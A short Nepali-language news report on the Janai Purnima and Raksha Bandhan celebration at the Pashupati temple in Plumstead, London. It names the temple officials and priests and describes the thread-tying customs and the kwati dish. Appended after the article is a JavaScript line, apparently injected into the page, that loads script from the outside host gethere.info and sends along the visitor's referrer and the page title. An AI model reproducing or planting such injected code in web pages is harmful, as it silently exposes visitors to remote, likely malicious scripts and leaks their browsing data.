लण्डन को प्लमस्टिड स्थित पशुपति मन्दिरमा हिन्दु धर्मावलम्विहरुको पर्व जनै पुर्णिमा तथा रक्षा वन्धन मनाइएको छ। सनिवार विहान ७ वजे देखि सुरु गरिएको कार्यक्रम दिन भरि चलेको मन्दिर संचालक समितीका अध्यक्ष वालजंग अर्याल ले वताउनु भयो। मन्दिरका ट्रस्टी तथा पत्रकार फणिन्द्र भट्टराईले दिएको जानकारी अनुसार मन्दिरमै रुद्राभिषेक पूजापछि जनै डोरोको मन्त्रण गरेर रक्षावन्धन गरिको छ। रक्षाबन्धन कार्यक्रमको संयोजन मन्दिरको कार्यसमिति सदस्य हरि पन्तले गरेका छन भने पण्डित विनोद पन्थी र विष्णु ज्ञवालीले कर्ताका रुपमा रक्षाबन्धन गराएका थिए।
हिन्दू धर्मावलम्बीहरुले ऋषिको सम्झना गर्दै जलाशय तथा धारामा गई माटो, गोबर, कुश, खरानी, अपमार्गले स्नान गरी विशेष मन्त्रबाट मन्त्रिएको जनै लगाउने गर्छन्। यस्तै सुरक्षाको लागि भन्दै नाडीमा मन्त्रिएको डोरो बाँधी रक्षाबन्धन पनि गरिन्छ। आज बाँधिएको डोरो गाई तिहारका दिन गाईका पुच्छरमा बाँधेमा मृत्युपछिको वैतरणी पार भइन्छ भन्ने जनविश्वास छ। यस्तै वर्षाभरको हिलोपानीमा चलेर गर्मीसर्दीले प्रभावित असरमा फेरि ऊर्जा ल्याउन भन्दै नौ जातका अंकुरित गेडागुडी मिसाएर पकाएको पौष्टिकतत्वयुक्त क्वाँटी खाने गरिन्छ।
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;